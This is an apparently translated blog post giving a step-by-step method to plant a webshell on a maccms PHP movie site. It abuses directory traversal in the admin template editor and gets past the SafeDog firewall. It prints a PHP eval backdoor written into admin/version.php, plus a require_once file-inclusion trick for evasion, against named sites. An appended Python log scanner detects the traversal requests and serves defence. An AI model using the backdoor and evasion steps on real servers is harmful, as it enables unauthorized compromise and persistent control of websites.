maccms PHP version: getting a webshell from the admin backend past SafeDog

Source: Internet
Author: User

Yesterday I recorded the process; there is not much content. Similar articles certainly exist; if there are similarities, it is a coincidence (my writing is not very good, so please bear with it):

Conditions:
1. The movie site runs the PHP version of maccms.
2. SafeDog is installed on the server.
3. You have the admin backend account and password.

Of course, the first step is to search Baidu for related articles. I found an upload vulnerability published earlier by Daniel, but testing it failed. Presumably it has been officially fixed.

After logging in to the backend, you can edit templates, for example:



Path:
http://www.bkjia.com/admin/admin_templates.php?action=edit&file=../template/default/html/art.html

Then construct the following in IE:
http://www.bkjia.com/admin/admin_templates.php?action=edit&file=index.php
Get:



This is much more powerful than ShopEx's backend directory traversal: you can not only view the content, but also edit it.
In this way, you can get a webshell. Nothing sophisticated. In order not to break the program, I plan to write a backdoor into this file:
http://www.bkjia.com/admin/admin_templates.php?action=edit&file=../admin/version.php




Click Save



Access http://0855.TV/admin/version.php and SafeDog shows an interception prompt:



A Baidu search turns up many PHP trojans that get past SafeDog. Below is the one I often use:



Of course, you can also add error suppression, written as follows:

Fuck you <?php @eval($_POST['a']);?>

The result is the same. Connect with a PHP one-liner client (errors may occur if you use China Chopper, the "kitchen knife"):



The file is written successfully.
In this way, we can use file inclusion to get past SafeDog (it seems everyone on Earth knows this. What? You don't? Baidu it).

I will not say much about ASP. Here is the PHP method:
Write a trojan with the suffix txt (for example, dama.txt), and then write a PHP file in the same directory. Its name is arbitrary and its content is as follows.

<?php require_once("dama.txt");?>



In this way, the webshell will be ready?

Thanks to Comrade Leng for providing the website and background services.
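
The template-editor requests shown above leave a clear trace in web server access logs. The following is an added example, not code from the original post or from maccms: it flags admin_templates.php edit requests whose file parameter resolves outside the template tree or targets a non-template file type. The base directory, template root, extension list and log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

EDITOR = "/admin/admin_templates.php"  # editor script named in the article
BASE_DIR = "/admin"            # assumption: `file` is resolved relative to this directory
TEMPLATE_ROOT = "/template/"   # assumption: the only tree the editor should touch
TEMPLATE_EXT = {".html", ".htm", ".css", ".js"}  # assumption: editable template types

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')

# Constructed access-log lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2013:10:00:01 +0800] "GET /admin/admin_templates.php?action=edit&file=../template/default/html/art.html HTTP/1.1" 200 4312',
    '203.0.113.7 - - [01/Jan/2013:10:00:09 +0800] "GET /admin/admin_templates.php?action=edit&file=index.php HTTP/1.1" 200 2210',
    '203.0.113.7 - - [01/Jan/2013:10:00:31 +0800] "GET /admin/admin_templates.php?action=edit&file=..%2Fadmin%2Fversion.php HTTP/1.1" 200 310',
    '203.0.113.9 - - [01/Jan/2013:10:01:02 +0800] "GET /index.php HTTP/1.1" 200 9000',
]


def classify(target):
    """Return None for unrelated requests, else (verdict, resolved_path)."""
    url = urlsplit(target)
    params = parse_qs(url.query)  # also percent-decodes the values
    if url.path != EDITOR or params.get("action") != ["edit"] or "file" not in params:
        return None
    raw = params["file"][0].replace("\\", "/")  # treat Windows separators alike
    resolved = posixpath.normpath(posixpath.join(BASE_DIR, raw))
    if not resolved.startswith(TEMPLATE_ROOT):
        return ("outside-template-root", resolved)
    if posixpath.splitext(resolved)[1].lower() not in TEMPLATE_EXT:
        return ("non-template-extension", resolved)
    return ("ok", resolved)


def scan(lines):
    """Return (line_number, verdict, resolved_path) for every suspicious edit request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        verdict = classify(match.group(1)) if match else None
        if verdict and verdict[0] != "ok":
            findings.append((number, verdict[0], verdict[1]))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same resolve-then-compare check, applied server-side before the editor opens a file, keeps it confined to the template tree.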
